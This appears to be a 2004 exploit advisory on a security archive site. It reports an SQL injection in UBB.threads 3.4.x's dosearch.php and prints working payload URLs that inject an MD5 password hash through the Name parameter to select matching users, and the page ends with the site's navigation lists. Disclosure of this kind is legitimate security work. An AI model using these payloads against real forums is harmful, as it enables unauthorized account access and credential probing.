ubbthreads.txt

ubbthreads.txt: Posted Oct 27, 2004; Authored by Florian Rock; UBB.threads 3.4.x is susceptible to SQL injection attacks.; tags | exploit, sql injection; SHA-256 | 1176de5c1b15e8f7b8429f321e35cfe188b48e789ca195924bfbedb19b60e07f; Download | Favorite | View

ubbthreads.txt

Product:
========
UBB.threads

Vendor:
=======
UBBCentral (http://www.ubbcentral.com/)

Versions:
=========
I tested it successfull on 3.4.x
At Version 3.5 you need to be logged in to perform a search. I didnt tested 
this version.

Problem:
========
Sql-Injection in dosearch.php
dosearch.php?Name=' OR U_Password='PWINMD5

Impact:
=======
A remote user can inject SQL commands

Example:
========
db5c82346d770f48bdd8929094c0c695 (ubbpass)

/dosearch.php?Name=' OR U_Password='db5c82346d770f48bdd8929094c0c695
OR
/dosearch.php?Name=' OR U_Password='db5c82346d770f48bdd8929094c0c695'/*
-> selects a user who got "ubbpass" as password.

Greets fly out to:
==================
felx, zodiac, nostalg1c, chris, lexxor, haggi, li, xlr, rest of p32,
peti, danjo, milch_trinker, hecky, and all i forgot

Greets
Florian Rock aka Remoter

Top Authors In Last 30 Days

Red Hat 229 files
indoushka 167 files
Jay Turla 150 files
Ubuntu 67 files
h00die 54 files
juan vazquez 43 files
sinn3r 41 files
H D Moore 31 files
Karn Ganeshen 23 files
Pedro Ribeiro 22 files

File Archives

Systems

AIX (430)
Apple (2,114)
BSD (378)
CentOS (61)
Cisco (1,954)
Debian (7,124)
Fedora (1,693)
FreeBSD (1,247)
Gentoo (4,567)
HPUX (881)
iOS (389)
iPhone (108)
IRIX (220)
Juniper (71)
Linux (51,237)
Mac OS X (696)
Mandriva (3,105)
NetBSD (256)
OpenBSD (490)
RedHat (16,845)
Slackware (941)
Solaris (1,615)
SUSE (1,444)
Ubuntu (9,852)
UNIX (9,456)
UnixWare (188)
Windows (6,772)
Other

ubbthreads.txt

ubbthreads.txt

File Archive:

September 2024

Top Authors In Last 30 Days

File Tags

File Archives

Systems

ubbthreads.txt

Share This

ubbthreads.txt

File Archive:

September 2024

Top Authors In Last 30 Days

File Tags

File Archives

Systems